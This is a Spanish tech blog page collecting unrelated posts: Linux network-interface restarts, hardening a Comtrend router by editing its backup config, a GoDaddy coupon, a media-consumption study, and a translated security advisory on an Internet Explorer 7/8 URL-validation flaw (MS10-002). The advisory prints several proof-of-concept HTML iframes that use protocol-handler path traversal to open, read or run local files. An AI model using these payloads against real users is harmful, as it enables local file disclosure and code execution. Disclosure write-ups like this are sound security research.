RootDev@blog:~$

Hay diversas estrategias para intentar recuperar nuestras interfaces de red (reiniciar interfaz de red) cuando se encuentrán inaccesibles. Podemos necesitar forzar el "down" de una interfaz de red cuando el NetworkManager no es capaz de arrancar porque otro proceso tiene bloqueado la tarjeta de red o simplemente la tarjeta está en un estado inconsistente o bloqueado. La idea es conseguir algo similar a lo que hace el comando ifdown (shutdown interface) / ifup.


a) En el caso de disponer de una tarjeta wifi y de un interruptor (normalmente en los portátiles), podemos realizar un apagado físico del dispositivo usando dicho interruptor y volver a encenderla.

b) Podemos probar directamente en el icono del NetworkManager , haciendo click con el botón derecho y pulsando sobre a "Activar red" para activar/desactivar toda nuestras redes. O en el caso de la wifi "activar inalámbrico"

c) Combinar las dos opciones anteriores, apagando tanto la tarjeta a nivel físico (interruptor) como el NetworkManager

d) Podemos "matar" y reiniciar el NetworkManager usando el comando:

(pidof NetworkManager | xargs kill -9 ) || NetworkManager
o simplemente
(pkill NetworkManager) || NetworkManager

donde pidof nos devuelve el pid (identificador del proceso) y en el caso de pkill mata un proceso por su nombre, en lugar de por el pid como hace el kill normal.

e) La última opción, pero no por ello la peor, consiste en usar el script de arranque /etc/init.d/network . Las opciones son las habituales:

/etc/init.d/network stop : realiza un "shut down" del NetworkManager,de todas las interfaces y del servicio network
/etc/init.d/network start : aranca el NetworkManager, las tarjetas de red y el servicio
/etc/init.d/network reload : realiza sucesivamente un stop y luego un start, es equivalente a reiniciar el servicio
/etc/init.d/network force-reload : fuerza un reload

Ejemplo:
Si estamos conectado a una red inalámbrica e intentamos poner la tarjeta inalámbrica en modo "Monitor":

iwconfig wlan0 mode Monitor

nos saldrá el mensaje de error:
Error for wireless request " Set Mode" (8B06):
SET failed on device wlan0 ; Device or resource busy.

Esto se debe a que el NetworkManager tiene ocupada la tarjeta inalámbrica. Asi que seguimos la estrategia (b):
click derecho en el NetworkManager y pulsamos "Activar inalámbrico" para desactivarla. Cuando esté desactivada podremos poner la tarjeta en modo monitor.

El ejemplo contrario. Si tras usar algún programa como kismet, no podemos volver a modo managed (iwconfig wlan0 mode Managed) o no funciona el NetworkManager usaremos alguna de las estrategias explicadas anteriormente. Por ejemplo como root ejecutaremos:

/etc/init.d/network reload

Y todo debería volver a la normalidad.


Artículo realizado por; dieguz2

El router comtrend 536+ es distribuido por jazztel y telefónica. En el caso de jazztel al pasar algún escaner de puertos online, aparecían puertos abiertos que no era posible cerrar a través de la interfaz web o de telnet. Con los siguientes pasos aseguraremos nuestro router, de modo que todos los puertos salvo los que abramos nosotros aparezcan cerrados.

1- Para acceder al router (en mi caso de jazztel), escribiremos la dirección http://192.168.1.1 .En mi caso el usuario es admin y la contraseña admin.

2- En el router es posible restringir desde donde se puede acceder para cambiar la configuración del router. Modificaremos las opciones en Management/ Access Control. Para permitir únicamente acceder al router desde la red local (LAN) y no permitirla desde internet (WAN). En la imagen está configurado para para permitir el acceso al router a través de la interfaz WEB y a través de TELNET. No debemos quitar todas las opciones de LAN o no podrémos acceder a la configuración del router



IMPORTANTE: también deberéis de marcar en LAN como Enable el puerto TFTP.

Aún Haciendo el paso 2, los puertos 80,21 y 23 aparecen abiertos. Si bien es cierto que desde fuera no pueden en principio acceder a la configuración, no es recomendable que aparezcan abiertos. Para cerrarlos seguiremos con los próximos pasos.

3) Exportamos la configuración actual a través de Management/ Settings / Backup y quedará guardado en un archivo de texto cuyo nombre por defecto es backupsettings.conf que guardaremos en el Escritorio o donde queramos.



4) Editamos el archivo backupsettings.conf con un editor de textos (notepad, vi, gedit, kate ...). Y buscamos la siguiente línea:

entry2 vccid="1" conid="2" name="pppoe_8_35_2" protocol="PPPOE" encap="LLC" firewall="disable" nat="enable" igmp="disable" vlanid="-31700" service="enable">

Cambiaremos firewall="disable" por firewall="enable" . De modo que la línea queda así:

entry2 vccid="1" conid="2" name="pppoe_8_35_2" protocol="PPPOE" encap="LLC" firewall="enable" nat="enable" igmp="disable" vlanid="-31700" service="enable">

NOTA: en ambas líneas es < style="font-weight: bold;">backupsettings.conf que hemos modificado al router. Vamos a Management/ Settings / Update. en examinar buscamos el archivo, y le damos al botón Update Settings.



6) Le damos a Management/ Save/Reboot para que se guarden los cambios y se reinicie el router. tras unos 2 minutos podremos volver a navegar y a pasar correctamente los escaners de puertos.


Artículo realizado por; dieguz2

Si estabas esperando el momento adecuado para armar un nuevo sitio web, y ya tienes en mente el dominio (digamos, la dirección) que querías para él, entonces quizás te interese saber que GoDaddy, una de las empresas para registrar dominios más grandes y conocidas, liberó un código especial para comprarlos por $0,99.

El código en cuestión es “BUY2010” y sirve para un solo dominio nuevo (no para renovaciones). Aunque no especifica, probablemente solo sirva para los más comunes y económicos (.com, .org, .net, .info, etc). Solo sigan los pasos habituales, y ya en la recta final, cuando les pregunte si tienen algún cupón especial, ingrésenlo.

Estas oportunidades son buenas para aprovechar, aunque aquí va un consejo de amiga: GoDaddy trata de venderte todo lo que pueda mientras registras tu dominio, así que a leer con cuidado y destildar todo lo que no quieran, no vaya a ser que se encuentren con una sorpresa al momento de pagar.

Vía | Bitelia

Muchas cosas están cambiando en el mundo de los medios de difusión de información siendo el principal “culpable” de dichos cambios este gran medio que es Internet. Y esto acaba de empezar, cada día que pasa las cosas se ponen más interesantes y lo que muchos jamás imaginaron que pasaría está comenzando a suceder.

Por ejemplo si hace cuatro o cinco años le hubiéramos dicho a cualquier magnate de la televisión que en poco tiempo Internet terminaría siendo su competidor más feroz, este probablemente se hubiera reído en nuestra cara. Pues bien, según la séptima edición del estudio Mediascope Europe, lo que muchos esperábamos finalmente ha pasado: los españoles ya se pasan más tiempo en Internet que delante de la televisión.

Y a España no tardarán en seguirla el resto de países europeos donde en general el consumo de Internet no para de aumentar, especialmente la tónica del “siempre conectado” continúa imparable y cada vez más europeos prefieren conectarse con el móvil a su Facebook, por ejemplo, que leer periódicos o revistas.

¿Esto en que se va a traducir? Pues lógicamente en que la inversión publicitaria va a mudar de la televisión a Internet y en que la oferta audiovisual en la red explotará de forma importante en muy poco tiempo, a día de hoy estamos viendo los primeros movimientos pero aún falta camino por recorrer.

Personalmente, y aunque muchos no me crean, espero que la industria tradicional de la televisión sepa adaptarse a los nuevos tiempos y aprovechar la red en su beneficio. Por ejemplo aquí en España ya hay algunas cadenas que están haciendo cosas interesantes en Internet, como Cuatro y su canal Play Cuatro desde el que podemos ver todos los programas propios de la cadena y quienes por primera vez también han empezado a ofrecer vía el mentado canal contenidos comprados a otras cadenas (me refiero a Lost).

Vía | ALT1040

############################################
Internet explorer 7 & 8 url validation vulnerability
Reportado por: http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html
URL afectada: http://www.microsoft.com
Avance acerca del bug: http://lostmon.blogspot.com/2010/02/internet-explorer-6-7-8-url-validation.html
Boletines relacionados: MS10-002 and ms10-007
CVE relacionado 2010-0027
OSVDB ID relacionado: 62245 and 62245
Secunia relacionado: SA38501 and SA38209
BID relacionado: 37884
############################################

############
Descripción
############

Internet Explorer contiene una vulnerabilidad de ejecución remota de código al validar correctamente la entrada.
Un atacante podría aprovechar esta vulnerabilidad mediante la construcción de una URL especialmente diseñada. Cuando un usuario hace click en la URL, la vulnerabilidad podría permitir la ejecución remota de código si ésto no se parchea.
Un atacante que aprovechase esta vulnerabilidad podría obtener los mismos derechos de usuario como usuario administrador registrado.

#################
Versiones afectadas
#################

Está probado en las versiones Internet Explorer 7 & 8 de windows.

En todas las versiones de Windows 7

Windows xp home y Windows xs pro

Por lo que podéis buscar en el boletín de Microsoft en qué sistemas es o no vulnerable para obtener una lista de todos los productos afectados por este bug.

#############
Seguimiento
#############

descubierto: 05/11/2009
informe al proveedor 15-11-2009
respuesta de los proveedores :15-11-2009
aceptación de proveedor en administrar el caso 19-11-2009
parcheo del proveedor 21-01-2010
distribuidor Patch2 :09-02-2010
divulgación pública: 21-01-2010
detalles de divulgación :10-02-2010

##############
Solución
##############

Ver: http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
y: http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx

para más detalles bajar el parche de Microsoft

#######################
Código de ejemplo y PoC
#######################

Esta vulnerabilidad está basada en la forma de cómo Internet Explorer valida los controladores de URI así como el char especial '#'

Para las pruebas y entendiendo primero de Internet Explorer, lo abrimos y ecribimos en la barra de direcciones una dirección falsa: `handler:' esto causa que IE nos redirija a una página interna 'res://ieframe.dll/unknownprotocol.htm' a causa de protocolo desconocido.

y si hacemos => handler:http://[some-host]', IE espera a abrir el host, pero no muestra ningún error o error desconocido de protocolo.

Si volvemos a escribir en la barra de direcciones: 'handler:handler2:' IE nos vuelve a redirijir a la página anterior: 'res://ieframe.dll/unknownprotocol.htm'

Pero si concadenamos dos controladores de protocolo y usamos el char especial '#' usando: 'handler:handler#:' IE nos muestra una alert diciendo "internet explorer no encuentra file:///'

Con esta combinación IE usa el controlador de protocolo.

Con este alert podemos pensar ... si queremos concadenar dos controladores y el char # y una ruta de archivo a la cual podemos tener acceso a los archivos en el disco duro.

"handler:handler#:c:\windows\calc.exe'
Pero nuevamente nos dice que 'internet explorer no encuentra el archivo'

Y si ponemos el acceso de archivos como trasversal: handler:handler#:../../../../C:\windows/calc.exe’
Ejecuta un prompt para descargar el archivo y hemos eludido las restricciones bypass!!

Así estamos trabajando en la barra de direcciones.

Una página web puede utilizar esta vulnerabilidad para aprovecharla y pedir para descargar el fichero que sea ? SÍ

podemos construir una página web con un iframe como por ejemplo:

############# PoC primero #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe">
</html>
################# EOF #################

Si lo abrimos a través de la carpeta local, o mediante un servidor local o como servidor de LAN o un servidor remoto, en todos los casos, por ejemplo preguntándole para descargar.

Podemos acceder a cualquier archivo en el disco duro de manera que se puede ejecutar o leer el contenido de un archivo ? SÍ

############## PoC segundo #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt">
</html>

############# EOF #################

Cuando abrimos este PoC, lee el contenido de our_txtfile.txt y lo muestra en el marco.

Podemos ejecutar archivos ? SÍ

Se puede ejecutar un archivo HTML o un archivo XML o búsqueda-ms
desde el disco duro por ejemplo:

############# PoC tercero ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>

############### EOF ###########

Si miramos Explorer se ejecuta una búsqueda en local :D

Se puede leer el contenido de cualquier archivo y subirlo a un servidor o gestionar el contenido ? Yo no he encontrado una manera de hacerlo, ya que a veces Internet Explorer niega el acceso a los contenidos del iframe.

############# PoC cuarto ##############

<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);

content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>

<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>

</body>
</html>

##################### EOF #############################

Que daría un error de acceso denegado, si utilizásemos XMLHttpRequest () sigue sin funcionar y de nuevo nos deniega el acceso:

########### PoC quinto ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;

###################################
Internet explorer 6 7 and 8 URL Validation Vulnerability
Afectado: http://www.Microsoft.com
Notificación al afectado: Sí Confirmación del afectado: Sí
REF Boletín:MS10-002
#########################################

Internet Explorer contiene una vulnerabilidad de ejecución remota de código al validar correctamente la entrada.
Un atacante podría aprovechar esta vulnerabilidad mediante la construcción de una URL especialmente diseñada. Cuando un usuario hace click en la URL, la vulnerabilidad podría permitir la ejecución remota de código si ésto no se parchea.
Un atacante que aprovechase esta vulnerabilidad podría obtener los mismos derechos de usuario como usuario registrado.

Por lo que si un usuario inicia sesión con derechos de usuario administrativos, un atacante que aprovechase esta vulnerabilidad podría tomar control total del sistema afectado. Se podrían instalar programas, ver, cambiar o eliminar datos o archivos, hasta crear nuevas cuentas con derechos de usuario.

Para ver esta vulnerabilidad como una entrada estándar en las listas de vulnerabilidades y exposiciones , consulte MS10-002 y CVE-2010-0027.

No hay más detalles en este momento.

Comentar que tengo un PoC pero por ahora lo mantengo en privacidad.

Tiempo transcurrido de esta vulnerabilidad:

Descubierta el: 05/11/2009
Información enviada al proveedor: 15-11-2009
Respuesta de los proveedores: 15-11-2009
Aceptación del proveedor en administrar el caso: 19-11-2009
El proveedor parchea la vulnerabilidad: 21-01-2010

################# €nd###############

Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team For support
Thnx To MSRC for Support

atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)

--------------------

thz Lost ;-)